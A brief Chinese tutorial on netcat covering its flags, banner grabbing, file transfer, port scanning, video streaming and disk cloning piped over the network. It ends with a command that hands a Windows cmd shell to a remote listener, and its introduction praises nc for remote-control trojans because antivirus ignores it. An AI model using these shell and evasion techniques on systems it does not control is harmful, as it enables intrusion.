网络工具中的瑞士军刀----体积小,功能强大
侦听模式/传输模式
telnet/获取banner信息
传输文本信息,文件,目录
加密传输文件,远程控制/木马,加密所有流量(来做远程控制是非常理想的选择,因为杀软不会把nc当成病毒杀掉)
可用作流媒体服务,
远程克隆硬盘,远程电子取证信息收集等
常用参数
-v 显示详细输出内容
-n 不进行dns解析
-l 监听模式
-p 监听端口号
-z 探测相应的端口有没有开放
-u 探测udp的端口开放情况
-q 任务完成退出
实例:
连接123.125.50.29的pop3端口,并且获取了banner信息
nc -lp监听本机的4444端口并把内容写到xxsec.txt中,客户端连接服务端的4444端口,进行远程操作,用作电子取证的时候可以尽量不破坏证据
服务端把接受到的文件重定向到x.txt文件,客户端把xxsec.txt文件传输到目标
也可以服务端准备好发送的文件,建立监听,客户端自定义文件名字连接,即把文件下载到客户端
先用tar命令打包一个文件夹,不用指定名字,然后nc监听本机 -q 1 是数据传输完成后1秒退出,接着客户端nc连接目标,并用tar命令解包, (细节不要忘了 - )
服务端cat一个视频 管道到nc,客户端连接到服务端,并使用视频播放器播放(mplayer播放器要自行安装)
可用来扫描端口,后面必须指定端口范围
用来克隆硬盘,也可以复制内存,演示就不做了,耗费时间
A:nc -lp 3333 | dd of=/dev/sdb
B:dd if=/dev/sda | nc -nv 192.168.1.10 3333 -q 1
B是被克隆的硬盘,A是要克隆B的硬盘
用来远程控制
正向:
反向:
windows服务端:nc -lp 6666
客户端:nc 192.198.1.11 6666 -c cmd
原文:https://www.cnblogs.com/Hydraxx/p/10388428.html